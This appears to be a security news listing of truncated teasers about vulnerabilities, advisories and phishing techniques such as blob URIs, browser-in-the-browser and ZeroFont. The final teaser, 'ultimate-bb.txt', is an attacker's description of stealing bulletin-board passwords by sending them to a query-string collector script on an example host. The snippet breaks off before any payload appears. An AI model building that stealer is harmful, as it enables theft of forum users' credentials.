CVE-2025-64984

Kaspersky has fixed a security issue in Kaspersky Endpoint Security for Linux any version with anti-virus databases prior to 18.11.2025, Kaspersky Industrial CyberSecurity for Linux Nodes any version with anti-virus databases prior to 18.11.2025, and Kaspersky Endpoint Security for Mac 12.0.0.325...

Phishing Attack Uses Blob URIs to Show Fake Login Pages in Your Browser

Cofense Intelligence reveals a novel phishing technique using blob URIs to create local fake login pages, bypassing email…...

The vulnerability of the JetBrains YouTrack software interface allows a hacker to bypass the authentication process and gain full access to any user’s account.

The vulnerability of the JetBrains YouTrack project and task management software interface involves exploiting a security flaw through phising techniques. Exploiting this vulnerability allows attackers to bypass the authentication process and gain full access to any user’s account...

The vulnerability of the Ivanti Workspace Control management console, related to bypassing authentication through spoofing, allows a perpetrator to elevate their privileges.

The vulnerability of Ivanti Workspace Control’s software for controlling user access to applications and data involves bypassing authentication through phising techniques. Exploiting this vulnerability can allow attackers to enhance their privileges...

Don't Click That ZIP File! Phishers Weaponizing .ZIP Domains to Trick Victims

A new phishing technique called "file archiver in the browser" can be leveraged to "emulate" a file archiver software in a web browser when a victim visits a .ZIP domain. "With this phishing attack, you simulate a file archiver software e.g., WinRAR in the browser and use a .zip domain to make it...

Browser-in-the-Browser Attack Makes Phishing Nearly Invisible

We’ve had it beaten into our brains: Before you go wily-nily clicking on a page, check the URL. First things first, the tried-and-usually-but-not-always-true advice goes, check that the site’s URL shows “https,” indicating that the site is secured with TLS/SSL encryption. If only it were that eas...

Email Phishers Using A Simple Way to Bypass MS Office 365 Protection

Security researchers have been warning about a simple technique that cyber criminals and email scammers are using in the wild to bypass most AI-powered phishing detection mechanisms implemented by widely used email services and web security scanners. Dubbed ZeroFont , the technique involves...

Mandrake Linux Security Advisory : kdelibs (MDKSA-2005:058)

A vulnerability in dcopserver was discovered by Sebastian Krahmer of the SUSE security team. A local user can lock up the dcopserver of other users on the same machine by stalling the DCOP authentication process, causing a local Denial of Service. dcopserver is the KDE Desktop Communication...

ultimate-bb.txt

I set up a script on some server somewhere that will mail me the contents of "whatever" in a url query as such - http://somehost.com/somescript.php/cgi/pl/asp?contents="whatever" when I have that script in place I post a message on the board that I wish to steal peoples passes from withfor Intern...